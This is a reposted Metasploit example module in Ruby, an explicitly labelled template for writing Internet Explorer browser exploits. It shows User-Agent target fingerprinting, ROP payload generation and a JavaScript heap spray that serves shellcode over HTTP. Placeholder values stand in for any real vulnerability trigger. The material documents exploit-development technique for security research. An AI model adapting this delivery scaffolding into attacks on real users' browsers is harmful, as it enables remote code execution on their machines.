首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Windows Browser Example Exploit
来源:metasploit.com 作者:sinn3r 发布时间:2017-07-17  
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

###
#
# This exploit sample demonstrates how a typical browser exploit is written using commonly
# used components such as: HttpServer, BrowserAutopwn, RopDB, DOM Element Property Spray.
#
###
class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::HttpServer::HTML
  include Msf::Exploit::RopDb
  include Msf::Exploit::Remote::BrowserAutopwn

  # Set :classid and :method for ActiveX exploits. For example:
  # :classid    => "{C3B92104-B5A7-11D0-A37F-00A0248F0AF1}",
  # :method     => "SetShapeNodeType",
  autopwn_info({
    :ua_name    => HttpClients::IE,
    :ua_minver  => "8.0",
    :ua_maxver  => "10.0",
    :javascript => true,
    :os_name    => OperatingSystems::Match::WINDOWS,
    :rank       => NormalRanking
  })

  def initialize(info={})
    super(update_info(info,
      'Name'           => "Module Name",
      'Description'    => %q{
        This template covers IE8/9/10, and uses the user-agent HTTP header to detect
        the browser version.  Please note IE8 and newer may emulate an older IE version
        in compatibility mode, in that case the module won't be able to detect the
        browser correctly.
      },
      'License'        => MSF_LICENSE,
      'Author'         => [ 'sinn3r' ],
      'References'     =>
        [
          [ 'URL', 'http://metasploit.com' ]
        ],
      'Platform'       => 'win',
      'Targets'        =>
        [
          [ 'Automatic', {} ],
          [ 'IE 8 on Windows XP SP3', { 'Rop' => :jre } ],
          [ 'IE 8 on Windows Vista',  { 'Rop' => :jre } ],
          [ 'IE 8 on Windows 7',      { 'Rop' => :jre } ],
          [ 'IE 9 on Windows 7',      { 'Rop' => :jre } ],
          [ 'IE 10 on Windows 8',     { 'Rop' => :jre } ]
        ],
      'Payload'        =>
        {
          'BadChars'        => "\x00",  # js_property_spray
          'StackAdjustment' => -3500
        },
      'Privileged'     => false,
      'DisclosureDate' => "Apr 1 2013",
      'DefaultTarget'  => 0))
  end

  def get_target(agent)
    return target if target.name != 'Automatic'

    nt = agent.scan(/Windows NT (\d\.\d)/).flatten[0] || ''
    ie = agent.scan(/MSIE (\d)/).flatten[0] || ''

    ie_name = "IE #{ie}"

    case nt
    when '5.1'
      os_name = 'Windows XP SP3'
    when '6.0'
      os_name = 'Windows Vista'
    when '6.1'
      os_name = 'Windows 7'
    when '6.2'
      os_name = 'Windows 8'
    when '6.3'
      os_name = 'Windows 8.1'
    end

    targets.each do |t|
      if (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? and t.name.include?(os_name))
        return t
      end
    end

    nil
  end

  def get_payload(t)
    stack_pivot = "\x41\x42\x43\x44"
    code        = payload.encoded

    case t['Rop']
    when :msvcrt
      print_status("Using msvcrt ROP")
      rop_payload = generate_rop_payload('msvcrt', code, {'pivot'=>stack_pivot, 'target'=>'xp'})

    else
      print_status("Using JRE ROP")
      rop_payload = generate_rop_payload('java', code, {'pivot'=>stack_pivot})
    end

    rop_payload
  end


  def get_html(t)
    js_p = ::Rex::Text.to_unescape(get_payload(t), ::Rex::Arch.endian(t.arch))
    html = %Q|
      <script>
      #{js_property_spray}

      var s = unescape("#{js_p}");
      sprayHeap({shellcode:s});
      </script>
    |

    html.gsub(/^\t\t/, '')
  end


  def on_request_uri(cli, request)
    agent = request.headers['User-Agent']
    print_status("Requesting: #{request.uri}")

    target = get_target(agent)
    if target.nil?
      print_error("Browser not supported, sending 404: #{agent}")
      send_not_found(cli)
      return
    end

    print_status("Target selected as: #{target.name}")
    html = get_html(target)
    send_response(cli, html, { 'Content-Type'=>'text/html', 'Cache-Control'=>'no-cache' })
  end
end

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Yahoo! Messenger Webcam 8.1 Ac
·Apache 2.2.0 - 2.2.11 Remote e
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
·HT Editor File openning Stack
  相关文章
·Metasploit Example Exploit
·Sophos Web Appliance 4.3.0.2 -
·iSmartAlarm CubeOne Remote Com
·FTPGetter 5.89.0.85 - Buffer O
·Firefox 50.0.1 - ASM.JS JIT-Sp
·Counter Strike: Condition Zero
·Apache Struts 2.3.x Showcase -
·PyCharm 2-0 / 2017 Buffer Over
·Skype for Business 2016 - Cros
·RaidenHTTPD 2.0.44 User-Agent
·IBM Informix 12.10 DB-Access B
·Microsoft Windows Windows 7/8.
  推荐广告
CopyRight © 2002-2017 VFocuS.Net All Rights Reserved